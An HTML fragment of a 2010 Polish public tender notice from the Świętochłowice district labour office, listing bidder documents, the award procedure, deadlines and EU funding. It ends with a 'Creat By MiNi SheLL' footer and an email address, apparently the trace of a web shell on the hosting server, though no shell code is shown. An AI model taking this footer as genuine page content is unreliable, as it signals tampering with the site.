<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pup.swietochlowice.sisco.info/.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Świętochłowicach
ul. Plebiscytowa 3/7
Świętochłowice pokój 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2010 godzina 08:00, miejsce: Powiatowy Urząd Pracy w Świętochłowicach
ul. Plebiscytowa 3/7
Świętochłowice pokój 8 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Europejski Fundusz Społeczny.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com